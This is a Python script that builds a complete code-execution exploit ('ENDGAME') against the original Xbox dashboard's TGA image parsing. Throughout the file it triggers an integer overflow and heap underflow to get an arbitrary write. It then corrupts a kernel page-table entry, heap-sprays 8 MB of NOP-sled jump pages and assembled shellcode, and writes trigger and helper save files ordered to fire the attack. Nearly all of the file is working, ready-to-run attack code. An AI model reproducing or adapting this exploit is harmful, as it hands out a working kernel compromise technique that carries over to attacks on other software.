import os import sys import ctypes import struct import subprocess try: import sim5960 SIM_ENABLED = True except ImportError: SIM_ENABLED = False #------------------------------------------------------------------------------ # Util #------------------------------------------------------------------------------ PAGE_SIZE = 0x1000 PTE_REGION = 0xc0000000 def pte_address(address): return PTE_REGION | (address >> 10) def p32(value): return struct.pack("I", value) def p16(value): return struct.pack("H", value) #------------------------------------------------------------------------------ # Exploit #------------------------------------------------------------------------------ BASE_PATH = os.path.join(os.path.dirname(__file__)) NASM_PATH = os.path.join(BASE_PATH, "nasm.exe") ENDGAME_PATH = os.path.join(BASE_PATH, "ENDGAME") # # SPRAY_BASE represents the approximate memory address of where we expect our # 8mb helper buffer to get decompressed and swizzled into memory. # # this buffer consists of two components of equal size that the exploit # depends on to obtain arbitrary code execution. half is made up of 'jump # pages' described later and the other half is shellcode pages. # # the *_MID variables should point approximately half way into each of the # two regions. this allows for +/- 2mb of wiggle room based on how memory # layout may drift a bit based on kernel, dash, or runtime discrepancies. # # the base address we hardcode was selected after scanning and dumping the # exact address from the exploit running against several kernel and dash # combinations. it should also be somewhat resilient to some amount of # auxillary 'navigation' around the dash prior to triggering ENDGAME. # SPRAY_BASE = 0xF271B000 SPRAY_JUMP_MID = SPRAY_BASE + 0x200000 SPRAY_PAYLOAD_MID = SPRAY_BASE + 0x600000 # # these two addresses represent the pages that we hope to 'sinkhole' by way of # PTE corruption. by manipulating their underlying PTEs, we are able to make # these point at entirely different pages in memory. # # the kernel page was hand selected based on reviewing the commonality between # retail kernels and basic runtime testing. the second PTE we corrupt is # mostly arbitrary but must be under the code selector limit (end of kernel) # TARGET_KERN_PAGE = 0x80022000 TARGET_XBEH_PAGE = 0x11000 TARGET_KERN_PTE = pte_address(TARGET_KERN_PAGE) # 0xc0200088 TARGET_XBEH_PTE = pte_address(TARGET_XBEH_PAGE) # 0xc0000044 def compile_shellcode(shellcode_filepath, debug=False): """ Compile the shellcode at the given path and return its bytes. """ assert shellcode_filepath.endswith(".asm") # Run nasm.exe and capture the output and errors command = [NASM_PATH, shellcode_filepath] if debug: command.insert(1, "-dDEBUG") print("[*] Assembling shellcode... ", end="") result = subprocess.run(command, capture_output=True) # Check the return code of the command if result.returncode == 0: output = result.stdout.decode() if output.strip(): print(output) # the command failed, print the error and exit the script else: print("[-] Failed to compile shellcode...") print(result.stderr.decode()) exit(1) print("done") # read the compiled shellcode from file and return it shellcode_bin_filepath, _ = os.path.splitext(shellcode_filepath) shellcode = open(shellcode_bin_filepath, "rb").read() return shellcode def make_helper(compress, debug): """ Generate the ENDGAME helper files (effectively a heap spray). """ PTE_VALUE = SPRAY_PAYLOAD_MID & 0xFFFFF000 PTE_VALUE |= 0x63 # (Accessed | Dirty | Valid | Writable) # # the jump (page) payload should be as small as possible (byte-wise) in an # effort to minimize the chance that naturally occurring calls into the # kernel (within this page) land on anything but one of our NOP's # # ideally we want to setup a safer region of memory and get off this page # as fast as possible. we do this by corrupting a second PTE that should # be within the code selector limit (thus, executable) and unused # jump_payload = b"" # corrupt XBE header PTE jump_payload += b"\xB8" + p32(TARGET_XBEH_PTE) # mov eax, 0xc0000044 jump_payload += b"\xC7\x00" + p32(PTE_VALUE) # mov DWORD PTR [eax], 0xf2fb7063 # jump to shellcode jump_payload += b"\x68" + p32(TARGET_XBEH_PAGE) # push target jump_payload += b"\x0F\x01\x3C\x24" # invlpg [esp] jump_payload += b"\xC3" # ret # # Construct the full jump page + payload. a specific kernel .text PTE will # be corrupted to point at one of these precisely aligned jump pages. # jump_page = b"\x90" * PAGE_SIZE jump_page += jump_payload # ensure the jump payload is aligned to the end of the jump page jump_page = jump_page[-PAGE_SIZE:] assert len(jump_page) == PAGE_SIZE # # because of the nature of heap unlink, a 4 byte value will get written # into one of our jump pages, specifically at the memory address: # # PTE_VALUE = ADDR_TRAMPOLINE & 0xFFFFF000 # PTE_VALUE |= 0x61 # PTE_VALUE += 0x4 # ... # *PTE_VALUE = 0xYYYYYYYY # # we insert a 0x68 byte into the jump page, creating a simple but safe # no-op 'mov eax, 0xYYYYYYYY' instruction within the page's NOP-sled for # the off chance we land within the anomalous page # jump_page = bytearray(jump_page) jump_page[0x64] = 0xB8 # replicate the completed single page across a 4mb block of memory jump_block = jump_page * 0x400 assert len(jump_block) == 0x400000 # # the shellcode page represents the phase of ENDGAME which equates to # fully unconstrained execution. # # in the current exploit structure, the shellcode should be less than # 4096 bytes. this is ample for doing cleanup / repair of the memory # space or further bootstrapping. # # the following logic will compile ENDGAME's shellcode with NASM and # return the resulting bytes. # shellcode_filepath = os.path.join(BASE_PATH, "shellcode.asm") shellcode = compile_shellcode(shellcode_filepath, debug) # # prefix the compiled shellcode (which *must* be position independent) # with NOP's to construct a full page. # shellcode_page = b"\x90" * PAGE_SIZE shellcode_page += shellcode # ensure the shellcode payload is aligned to the end of the page shellcode_page = shellcode_page[-PAGE_SIZE:] assert len(shellcode_page) == PAGE_SIZE # replicate the completed single page across a 4mb block of memory shellcode_block = shellcode_page * 0x400 assert len(shellcode_block) == 0x400000 # # construct the full helper blob. this represents exactly what we hope to # see in memory once our texture has been fully decompressed and swizzled # # when debugging ENDGAME or researching this exploit, you can locate this # buffer in memory using the following WinDbg command: # # kd> s F0000000 L08000000 41 51 61 71 # full = b"" full += b"\x41\x51\x61\x71" # marker DWORD for debug / mem searching full += jump_block[4:] # 4mb of jump pages full += shellcode_block # 4mb of shellcode pages assert len(full) == (0x800000), f"Actual len 0x{len(full):X}" # # when being processed and loaded by the dashboard, our helper blob will # get SWIZZLED (as it is technically a d3d texture)... so we have to # preemptively UN-SWIZZLE it here. # # It's an 0x400 x 0x800 x 4 texture (so, 8mb). # print("[*] Un-swizzling payload... ", end="") unswiz_data = unswizzle32(full, 0x400, 0x800) print("done") # # the TGA format allows for run-length encoding of its data, so for fun # we actually compress our un-swizzled buffer to reduce its physical size # by over 10x (8mb --> 750kb) -- this ensures it should fit on any MU. # if compress: print("[*] Compressing payload... ", end="") final_data = rle_compress(unswiz_data, 0x400) print("done") else: final_data = unswiz_data # # for the purpose of this helper buffer/texture, we don't need to do # anything buggy. simply create a TGA of the proper dimensions, with # simple "top to bottom" and "left to right" properties # tga_data = make_tga(0x400, 0x800, 4, final_data, 0x28, compress) if SIM_ENABLED: LoadTGA = sim5960.LoadTGA() status, decomp_data, parsed = LoadTGA.run(tga_data) print(f"[*] Valid? {status == 0}, data left over... 0x{parsed:X}") if status: print(f"[-] FAIL: {status:08X}") assert False # # write the exploit "helper" files to disk. note that this SaveImage must # belong to a game title of alphabetical priority higher than the "trigger" # files. this ensures the dash maps our helper into memory first. # print("[*] Saving helper files... ", end="") spray_dir = os.path.join(ENDGAME_PATH, "helper", "0") os.makedirs(spray_dir, exist_ok=True) with open(os.path.join(spray_dir, "..", "TitleMeta.xbx"), "wb") as f: f.write(b"\xFF\xFE" + "TitleName=HELPER\r\n".encode("utf-16-le")) with open(os.path.join(spray_dir, "SaveImage.xbx"), "wb") as f: f.write(tga_data) # all done print("done") return def make_trigger(): """ Generate the ENDGAME trigger files. """ PTE_VALUE = SPRAY_JUMP_MID & 0xFFFFF000 PTE_VALUE |= 0x61 # (Accessed | Dirty | Valid) # # ENDGAME abuses an integer overflow in the allocation and processing of # TGA (image) files, enabling several powerful heap primitives. # # this is combined with TGA's 'bottom to top' image flag to perform a # 16-byte heap underflow, precisely corrupting the chunk's heap metadata # to setup a pretty traditional unlink-style write4 primitive. # # to make ENDGAME kernel and dash agnostic, it precisely targets the PTE # for a kernel .text page (kudos to mborgerson for the inspiration) as a # generic means of obtaining code execution from a single arbitrary write. # payload = b"" # this block overwrites the heap metadata (the 16 byte underflow) payload += p16(0x0001) # -0x10 - Size payload += p16(0x0000) # -0x0D - Previous size payload += b"\x00" # -0x0C - Segment index payload += b"\x00" # -0x0B - Flags payload += b"\x00" # -0x0A - Index payload += b"\x00" # -0x09 - Mask payload += p32(0x44444444) # -0x08 payload += p32(0x45454545) # -0x04 # this block will be at the start of our heap allocation (a fake chunk) payload += p16(0x1000) # -0x10 - Size payload += p16(0x4343) # -0x0D - Previous size payload += b"\x00" # -0x0C - Segment index payload += b"\x00" # -0x0B - Flags payload += b"\x00" # -0x0A - Index payload += b"\x00" # -0x09 - Mask payload += p32(PTE_VALUE) # -0x08 - ENDGAME write value payload += p32(TARGET_KERN_PTE) # -0x04 - ENDGAME write address # # trigger info # # - tga.width = 0xFFFD # - tga.height = 0x8002 # - tga.img_depth = 2 (bytes, or 16bits) # - tga.img_descriptor = 8 (bottom to top, left to right) # # (0xFFFD * 0x8002 * 2) = 0x10000FFF4 # # NOTE: since we do not provide a sufficient amount of data to load a # complete image, the dash's TGA parsing logic fails and will immediately # free our corrupted chunk setting the full exploit into motion # tga_data = make_tga(0x8002, 0xFFFD, 2, payload, 8, False) # # write the exploit "trigger" files to disk. note that this SaveImage must # belong to a game title of alphabetical priority lower than the "helper" # files. this ensures the dash triggers the exploit at the correct time # print("[*] Saving trigger files... ", end="") trigger_dir = os.path.join(ENDGAME_PATH, "trigger", "1") os.makedirs(trigger_dir, exist_ok=True) with open(os.path.join(trigger_dir, "..", "TitleMeta.xbx"), "wb") as f: f.write(b"\xFF\xFE" + "TitleName=TRIGGER\r\n".encode("utf-16-le")) with open(os.path.join(trigger_dir, "SaveImage.xbx"), "wb") as f: f.write(tga_data) # all done print("done") return #------------------------------------------------------------------------------ # DirectX (special thanks to xbox7887) #------------------------------------------------------------------------------ def generate_swizzle_masks(width, height): """ Generate bit masks for swizzling based on the given dimensions. """ assert (width > 0 and (width & (width - 1)) == 0), "Width must be a power of 2" assert (height > 0 and (height & (height - 1)) == 0), "Height must be a power of 2" x, y = 0, 0 bit, mask_bit = 1, 1 done = False while not done: done = True if bit < width: x |= mask_bit mask_bit <<= 1 done = False if bit < height: y |= mask_bit mask_bit <<= 1 done = False bit <<= 1 return x, y def fill_swizzle_pattern(pattern, value): """ Apply swizzle pattern to a given value for address calculation. """ result = 0 bit = 1 while value != 0: if pattern & bit != 0: result |= bit if value & 1 != 0 else 0 value >>= 1 bit <<= 1 return result def unswizzle32(data, width, height): """ Convert swizzled buffer to linear format for 32-bit pixels. """ mask_x, mask_y = generate_swizzle_masks(width, height) dst_buf = bytearray(len(data)) for y in range(height): src_y_offset = fill_swizzle_pattern(mask_y, y) * 4 dst_y_offset = width * y * 4 for x in range(width): src_offset = src_y_offset + fill_swizzle_pattern(mask_x, x) * 4 dst_offset = dst_y_offset + x * 4 dst_buf[dst_offset:dst_offset+4] = data[src_offset:src_offset+4] return bytes(dst_buf) #------------------------------------------------------------------------------ # Truevision TGA #------------------------------------------------------------------------------ class TGAHeader(ctypes.Structure): _pack_ = 1 _fields_ = [ ("id_len", ctypes.c_byte), ("color_map_type", ctypes.c_byte), ("img_type", ctypes.c_byte), ("color_map_ofs", ctypes.c_ushort), ("num_color_map", ctypes.c_ushort), ("color_map_depth", ctypes.c_byte), ("x_offset", ctypes.c_ushort), ("y_offset", ctypes.c_ushort), ("width", ctypes.c_ushort), ("height", ctypes.c_ushort), ("img_depth", ctypes.c_byte), ("img_descriptor", ctypes.c_byte) ] @property def top_to_bottom(self): return (self.img_descriptor & 0x20) == 0x20 @property def left_to_right(self): return (self.img_descriptor & 0x10) != 0x10 @property def compressed(self): return bool(self.img_type & 0x08) def __str__(self): """ Pretty-print the TGAHeader. """ lines = ["TGAHeader - "] for field_name, field_type in self._fields_: value = getattr(self, field_name) line = f"{field_name.rjust(18, ' ')}: 0x{value:02X}" lines.append(line) if field_name == "img_type": lines.append(f" |--- compressed: {self.compressed}") if field_name == "img_descriptor": lines.append(f" |- top_to_bottom: {self.top_to_bottom}") lines.append(f" |- left_to_right: {self.left_to_right}") return "\n".join(lines) def make_tga(width, height, depth=4, data=b"", descriptor=8, rle=True): """ Initialize a TGA with the given properties and return its bytes. """ tga = TGAHeader() tga.img_type = 2 tga.img_type |= (int(rle) << 3) if not (0 < width < 0x10000): raise ValueError("Invalid width") if not (0 < height < 0x10000): raise ValueError("Invalid height") tga.width = width tga.height = height if not (0 < depth < 5): raise ValueError("Invalid depth") tga.img_depth = (depth * 8) tga.img_descriptor = descriptor return bytes(tga) + data def rle_compress(data, width): """ Run-length encode (compress) the given data for a TGA image. """ depth = 4 output = bytearray() for row_start in range(0, len(data), width): offset = row_start while offset < row_start + width: pattern = data[offset:offset+depth] offset += depth count = 0 while offset < row_start + width and data[offset:offset+depth] == pattern and count < 127: count += 1 offset += depth rle_byte = 0x80 | count if count else 0 output.extend([rle_byte] + list(pattern)) return bytes(output) #------------------------------------------------------------------------------ # Main #------------------------------------------------------------------------------ def main(argc, argv): """ Script main. """ # simple argument parsing / check to build a debug version of the exploit debug = argc > 1 and argv[1] in ["-d", "--debug"] # generate the ENDGAME exploit files print(f"[*] Generating ENDGAME v1.0{' (debug)' if debug else ''} exploit files -- by Markus Gaasedelen & shutterbug2000") make_helper(True, debug) make_trigger() print(f"[+] Success, exploit files available in ENDGAME/ directory") if __name__ == "__main__": main(len(sys.argv), sys.argv)